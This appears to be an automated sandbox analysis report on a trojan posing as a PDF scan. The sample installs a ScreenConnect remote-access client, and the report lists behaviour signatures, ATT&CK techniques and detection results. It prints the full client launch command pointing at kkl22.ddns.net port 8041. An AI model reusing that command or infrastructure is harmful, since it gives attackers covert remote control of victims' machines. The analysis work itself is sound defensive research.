                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2618019863.00000000010BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                              Source: setup.msi.0.drBinary or memory string: VMCi-
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: 0.2.Scan_PDF_5255303072.exe.5760000.5.raw.unpack, NativeLibrary.csReference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
                              Source: 0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: 0.0.Scan_PDF_5255303072.exe.8b78f8.3.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"Jump to behavior
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.clientservice.exe" "?e=access&y=guest&h=kkl22.ddns.net&p=8041&s=13ce54a3-51cc-45e8-93e2-c37e596084ea&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&t=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C13704 CreateNamedPipeW,8_2_05C13704
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_01AD4C6A RtlGetVersion,8_2_01AD4C6A
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                              Source: Yara matchFile source: Scan_PDF_5255303072.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.2.Scan_PDF_5255303072.exe.5bf0000.12.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.26bfa50.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.3b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Scan_PDF_5255303072.exe.5bf0000.12.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.Scan_PDF_5255303072.exe.3863d8.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.Scan_PDF_5255303072.exe.435db8.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.Scan_PDF_5255303072.exe.370000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 10.2.ScreenConnect.WindowsClient.exe.250fa90.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.1398979904.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.2621215881.0000000002641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000002.1486728032.0000000002491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1385033934.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: Scan_PDF_5255303072.exe PID: 7868, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 8128, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7136, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 980, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Config.Msi\4a71ed.rbs, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI74E9.tmp, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Valid Accounts
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomains1
                              Replication Through Removable Media
                              1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Valid Accounts
                              1
                              Valid Accounts
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron2
                              Windows Service
                              1
                              Access Token Manipulation
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture11
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd1
                              Bootkit
                              2
                              Windows Service
                              1
                              DLL Side-Loading
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts13
                              Process Injection
                              1
                              DLL Search Order Hijacking
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              File Deletion
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                              Masquerading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              Valid Accounts
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd51
                              Virtualization/Sandbox Evasion
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                              Process Injection
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Hidden Users
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                              Bootkit
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                              Rundll32
                              Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523874 Sample: Scan_PDF_5255303072.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 46 55 kkl22.ddns.net 2->55 61 Multi AV Scanner detection for submitted file 2->61 63 .NET source code contains potential unpacker 2->63 65 .NET source code references suspicious native API functions 2->65 69 4 other signatures 2->69 8 ScreenConnect.ClientService.exe 2 5 2->8         started        12 msiexec.exe 94 51 2->12         started        15 Scan_PDF_5255303072.exe 4 2->15         started        17 svchost.exe 2->17         started        signatures3 67 Uses dynamic DNS services 55->67 process4 dnsIp5 57 kkl22.ddns.net 188.119.113.59, 49710, 8041 SERVERIUS-ASNL Russian Federation 8->57 73 Reads the Security eventlog 8->73 75 Reads the System eventlog 8->75 19 ScreenConnect.WindowsClient.exe 2 8->19         started        22 ScreenConnect.WindowsClient.exe 2 8->22         started        45 C:\...\ScreenConnect.ClientService.exe, PE32 12->45 dropped 47 C:\Windows\Installer\MSI7A98.tmp, PE32 12->47 dropped 49 C:\Windows\Installer\MSI74FA.tmp, PE32 12->49 dropped 51 9 other files (none is malicious) 12->51 dropped 77 Enables network access during safeboot for specific services 12->77 79 Modifies security policies related information 12->79 24 msiexec.exe 12->24         started        26 msiexec.exe 1 12->26         started        28 msiexec.exe 12->28         started        81 Contains functionality to hide user accounts 15->81 30 msiexec.exe 6 15->30         started        file6 signatures7 process8 file9 71 Contains functionality to hide user accounts 19->71 33 rundll32.exe 10 24->33         started        53 C:\Users\user\AppData\Local\...\MSI6E42.tmp, PE32 30->53 dropped signatures10 process11 file12 37 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 33->37 dropped 39 C:\...\ScreenConnect.InstallerActions.dll, PE32 33->39 dropped 41 C:\Users\user\...\ScreenConnect.Core.dll, PE32 33->41 dropped 43 4 other files (none is malicious) 33->43 dropped 59 Contains functionality to hide user accounts 33->59 signatures13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              Scan_PDF_5255303072.exe18%ReversingLabsWin32.Trojan.Generic
                              Scan_PDF_5255303072.exe25%VirustotalBrowse
                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe3%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.Cab.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Windows\Installer\MSI74FA.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI7A98.tmp0%ReversingLabs
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              kkl22.ddns.net0%VirustotalBrowse
                              SourceDetectionScannerLabelLink
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              https://feedback.screenconnect.com/Feedback.axd0%VirustotalBrowse
                              http://wixtoolset.org/releases/0%VirustotalBrowse
                              http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v0%VirustotalBrowse
                              http://wixtoolset.org/news/0%VirustotalBrowse
                              https://docs.rs/getrandom#nodejs-es-module-support0%VirustotalBrowse
